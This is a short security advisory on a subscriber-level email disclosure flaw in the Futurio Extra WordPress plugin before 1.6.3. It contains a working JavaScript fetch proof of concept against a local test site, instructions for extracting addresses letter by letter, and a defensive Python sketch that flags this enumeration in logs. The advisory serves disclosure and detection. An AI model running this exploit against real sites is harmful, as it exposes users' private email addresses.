wpexploit | Krzysztof Zając | WPEX-ID:B655FC21-47A1-4786-8911-D78AB823C153
Jan 14, 2022 - 12:00 a.m.

Futurio Extra < 1.6.3 - Subscriber+ User Email Address Disclosure

EPSS: 0.001 Low (percentile: 24.8%)

The plugin allows any logged-in user, such as a subscriber, to extract any other user’s email address.

fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "dilaz_mb_query_select", "q": "@gma", "query_type": "user"}),
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

If a given user name appears in the output list, that user has "@gma" in their e-mail address. Any user's e-mail address can then be extracted letter by letter.
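A detection sketch for the letter-by-letter lookups described above, as an added example that is not part of the original advisory. It assumes POST bodies sent to admin-ajax.php are logged; the record layout, account names and sample lines are constructed. It flags accounts whose user lookups grow by one character at a time.

```python
from collections import defaultdict
from urllib.parse import parse_qs

ACTION = "dilaz_mb_query_select"  # AJAX action named in the advisory

# Constructed sample: (account, POST body sent to /wp-admin/admin-ajax.php).
# Assumes a WAF or audit log that records request bodies; the tuple layout is hypothetical.
SAMPLE = [
    ("subscriber-17", "action=dilaz_mb_query_select&q=%40gma&query_type=user"),
    ("subscriber-17", "action=dilaz_mb_query_select&q=%40gmah&query_type=user"),
    ("subscriber-17", "action=dilaz_mb_query_select&q=%40gmai&query_type=user"),
    ("subscriber-17", "action=dilaz_mb_query_select&q=%40gmail&query_type=user"),
    ("subscriber-17", "action=dilaz_mb_query_select&q=x%40gmail&query_type=user"),
    ("subscriber-17", "action=dilaz_mb_query_select&q=e%40gmail&query_type=user"),
    ("subscriber-17", "action=dilaz_mb_query_select&q=ce%40gmail&query_type=user"),
    ("editor-3", "action=dilaz_mb_query_select&q=al&query_type=user"),
    ("editor-3", "action=dilaz_mb_query_select&q=alice&query_type=user"),
    ("editor-3", "action=dilaz_mb_query_select&q=news&query_type=post"),
]


def user_queries(records):
    """Group the q values of user-type lookups by requesting account."""
    grouped = defaultdict(list)
    for account, body in records:
        form = parse_qs(body, keep_blank_values=True)
        if form.get("action") == [ACTION] and form.get("query_type") == ["user"]:
            grouped[account].append(form.get("q", [""])[0])
    return dict(grouped)


def growth_depth(queries):
    """Longest chain in which each query contains an earlier one plus one character."""
    depth = []
    for i, q in enumerate(queries):
        parents = [depth[j] for j in range(i)
                   if len(q) == len(queries[j]) + 1 and queries[j] in q]
        depth.append(1 + max(parents, default=0))
    return max(depth, default=0)


def flag_enumeration(records, min_depth=4):
    """Accounts whose lookups grow one character at a time for min_depth steps.
    Interactive typeahead also grows, so tune min_depth against normal traffic."""
    depths = {a: growth_depth(qs) for a, qs in user_queries(records).items()}
    return {a: d for a, d in depths.items() if d >= min_depth}


if __name__ == "__main__":
    print(flag_enumeration(SAMPLE))
```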
